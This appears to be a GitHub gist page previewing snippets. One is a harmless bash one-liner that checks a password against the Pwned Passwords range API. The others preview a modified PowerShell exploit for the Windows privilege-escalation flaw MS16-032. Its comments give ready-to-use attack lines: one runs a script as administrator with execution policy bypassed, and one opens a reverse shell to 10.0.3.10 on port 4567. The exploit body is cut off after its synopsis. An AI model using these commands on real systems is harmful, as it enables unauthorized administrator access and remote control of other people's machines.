This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
## One-liner password leak check + k-anonymity method (w/out exposing the password on request) | |
# Compute the SHA1, Grab 1st 5 chars of the hash, check by range on huge haveibeenpwnd DB! | |
# original source: https://news.ycombinator.com/item?id=16432344 | |
VARPWD='test123'; HASH=`echo -n $VARPWD | sha1sum`; curl --silent https://api.pwnedpasswords.com/range/`cut -b 1-5 <(echo $HASH)` --stderr - | grep -i `cut -b 6- <(echo $HASH) | cut -d ' ' -f 1` |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
## intrd's MS16-032 priv escalation exploit modded - interactive shell & command argv | |
# exploit MS16-032 and run shell.ps1(ATTACHMNT) as administrator: Invoke-MS16-032 "-NoProfile -ExecutionPolicy Bypass -Command Import-Module C:\Users\IEUser\Desktop\shell.ps1;Start-Sleep -s 10" | |
# reverse shell as current user: Invoke-PowerShellTcp -Reverse -IPAddress 10.0.3.10 -Port 4567 | |
function Invoke-MS16-032 { | |
<# | |
.SYNOPSIS | |
PowerShell implementation of MS16-032. The exploit targets all vulnerable |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Invoke-MS16-032 { | |
<# | |
.SYNOPSIS | |
PowerShell implementation of MS16-032. The exploit targets all vulnerable | |
operating systems that support PowerShell v2+. Credit for the discovery of | |
the bug and the logic to exploit it go to James Forshaw (@tiraniddo) and @Fuzzysec for the original PS script. | |
Modifications by Mike Benich (@benichmt1). | |
Targets: |